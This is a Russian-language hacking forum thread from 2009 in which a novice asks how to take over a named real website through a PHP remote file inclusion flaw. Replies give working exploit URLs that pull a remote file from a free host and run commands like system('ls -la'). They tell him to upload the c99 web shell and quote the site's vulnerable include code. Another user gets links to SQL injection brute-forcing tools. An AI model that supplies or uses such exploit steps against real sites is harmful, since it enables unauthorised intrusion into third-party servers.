15.06.2009, 19:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от Велемир
Тык инклуд работает ?)
http://www.alertsite.com/phplive/image.php?l=image.php
Так работает/будет работать или нет/не будет работать ? Ответа я так и не получил.Мне только выводит is_dir() функцию,как ты и писал.
|
|
|
15.06.2009, 10:07
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
С нами:
8905480
Репутация:
6
|
|
Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.
<?php
print("<h3>SHELL</h3>");
print(system("ls -al"));
?>
подставил так
http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
отобразилось токо слов SHELL.
Подскажите, как взять сервак под контроль?
|
|
|
|
15.06.2009, 10:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от main()
Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.
<?php
print("<h3>SHELL</h3>");
print(system("ls -al"));
?>
подставил так
http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
отобразилось токо слов SHELL.
Подскажите, как взять сервак под контроль?
ты не так ввел)))надо так http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.txt
что бы в конце было не пхп а тхт
P.S. пл* у кого корявblе сообщение что аш раздуваются посты ))))
если не понял то стукани в асю
Последний раз редактировалось HAXTA4OK; 15.06.2009 в 10:55..
|
|
|
|
15.06.2009, 10:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Обычный RFI, заливаешь УЖЕ полноценный шелл хоть на народ.ру и просто указываешь ссылку на него - только что проверил на с99-шелле
Но если ты так любишь извращения, то залей на народ.ру (свой сайт) такой eval.txt:
и потом подключи вот так:
Код:
http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=phpinfo();
http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=system('ls%20-la');
но в последнем случае пишет:
Код:
Warning: system() has been disabled for security reasons
так что не парься и подключай нормальный шелл сразу 
Последний раз редактировалось Pashkela; 15.06.2009 в 10:25..
|
|
|
|
15.06.2009, 10:47
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Подскажите программы,работающие независимо друг друга:
1. Для автоматизированного подбора полей.
2. Для автоматизированного подбора столбцов.
3. Для брута имен столбцов.
SIPT 4.0 НЕ ПОДХОДИТ))
|
|
|
|
15.06.2009, 10:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от jecka3000
Подскажите программы,работающие независимо друг друга:
1. Для автоматизированного подбора полей.
2. Для автоматизированного подбора столбцов.
3. Для брута имен столбцов.
SIPT 4.0 НЕ ПОДХОДИТ))
Код:
http://pashkela.narod.ru/progi/MySql4Bruter.rar - брутер mysql4
http://pashkela.narod.ru/progi/MySQL_column.rar - подбор кол-ва колонок
не всегда пашут, т.к. нет замены /**/ на просто пробел или плюс и прочее. Readme в комплекте
|
|
|
|
15.06.2009, 11:27
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
С нами:
8905480
Репутация:
6
|
|
pashkelka,haxtachak спасибо что разъяснили. Я нашол в нете shell c99. залил на народ и запустил. первый раз ничего не отбразилось. 2 раз когда подрдактировал
$surl = "http://catenabrasil.com/portal/index.php?arq="; //link to this script, INCLUDE "?".
чтото появилось, но работает очень жопно.
вот взгляните:
и при попытке открыть что либо выскакивает эта шняга.
Warning: include_once(act=ls) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
Warning: include_once() [function.include]: Failed opening 'act=ls' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69
PS обясните плиз новичку. я первый раз делаю такое
модет кто даст линки на более простые шеллы и описание их конфига?
Последний раз редактировалось main(); 15.06.2009 в 11:34..
|
|
|
|
15.06.2009, 10:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
странный чел - а где расширение файла? А что там внутри - мне гадать надо? )
вот нормальный, рабочий шелл
https://forum.antichat.ru/thread125103.html
заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)
PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php |
|
|
|
15.06.2009, 11:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Pashkela
странный чел - а где расширение файла? А что там внутри - мне гадать надо? )
.....
заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)
....
PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php Дружище, я смотрю вчерашняя беседа прошла даром.
Вот код из скрипта:
PHP код:
<?
$arq = $_REQUEST["arq"];
if ((isset($arq)) and ($arq != "")){
include_once($arq);
}
elseif (isset($_POST['keyGen'])){
include_once($arq);
}
else {
include_once('empresa.php');
}
?>
ЭТО ИНКЛУД!!! И ему абсолютно пофигу какое расширение и есть ли оно вообще. И уж тем-более на народе.
ЗЫ Только не надо мне рассказывать , что при инклуде .php он исполнится на стороне того сервера, (я это как-бэ знаю). Народ это не тот случай, и не путай новичка пожалуйста
|
|
|
|
15.06.2009, 11:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Pashkela, спб за софт, но я так понял, что прога для поиска количесвта колнок подбирает только лишь принтабельный столбец, а сами колонки она игнорирует....)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
